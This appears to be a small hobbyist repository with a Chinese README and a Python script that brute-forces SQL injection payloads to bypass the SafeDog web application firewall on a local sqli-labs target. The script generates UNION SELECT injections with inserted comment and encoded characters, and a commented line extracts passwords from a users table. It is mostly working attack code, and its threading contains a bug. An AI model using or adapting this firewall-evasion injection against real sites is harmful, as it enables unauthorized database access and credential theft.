├── README.md
└── fuzz安全狗.py


/README.md:
--------------------------------------------------------------------------------
 1 | 
 2 | # fuzz方法绕过安全狗的测试
 3 | 
 4 | 以sqli lab 第六关为测试环境
 5 | 
 6 | 成功bypass
 7 | 
 8 | 注释里的payload可以成功跑出表名列名里的信息，前提要知道表名列名
 9 | 
10 | information_shema里获取表名列名没有尝试，理论上利用跑出来的payload就可以查询出表名列名
11 | 
12 | 安全萌新，py初学者，大佬勿喷，求star鼓励。
13 | 


--------------------------------------------------------------------------------
/fuzz安全狗.py:
--------------------------------------------------------------------------------
 1 | #encoding = utf8
 2 | import requests
 3 | from queue import Queue
 4 | import threading
 5 | 
 6 | fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
 7 | fuzz_sz = ['',' ']
 8 | fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
 9 | Fuzz=fuzz_ch+fuzz_sz+fuzz_zs
10 | class fuzz:
11 |     def __init__(self,root,ThreadNum=5):
12 |         self.root="http://192.168.1.109/sqli/Less-5/?id=1"
13 |         self.ThreadNum=5
14 |         self.headers = {
15 |              'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20',
16 |              'Referer': 'http://www.camel.com',
17 |              'Cookie': 'whoami=digo8',
18 |              }
19 |         self.task =Queue()
20 |         for a in Fuzz:
21 |             for b in Fuzz:
22 |                 for c in Fuzz:
23 |                     for d in Fuzz:
24 |                         exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,3 --+"
25 |                         '''exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,password /*!from "+a+b+c+d+"users*/--+"'''
26 |                         self.task.put(exp)
27 |         self.s_list = []
28 |     
29 |     def visit(self,url):
30 |         try:
31 |             r = requests.get(url,headers=self.headers)
32 |             ret=r.text
33 |         except:
34 |             print ("Fail to connect...")
35 |             ret=""
36 |         return ret
37 | 
38 |     def test_url(self):
39 |         while not self.task.empty():
40 |             url = self.task.get()
41 |             ret = self.visit(url)
42 |             if "Dhakkan" in ret and not "error" in ret :
43 |                 self.s_list.append(url)
44 |                 print (url)
45 |     
46 |     def work(self):
47 |         threads = []
48 |         for i in range(self.ThreadNum):
49 |             t = threading.Thread(target=self.test_url())
50 |             threads.append(t)
51 |             t.start()
52 |         for t in threads:
53 |             t.join()
54 | obj=fuzz("http://192.168.1.108/sqli/Less-5/?id=1")
55 | obj.work()
56 | 


--------------------------------------------------------------------------------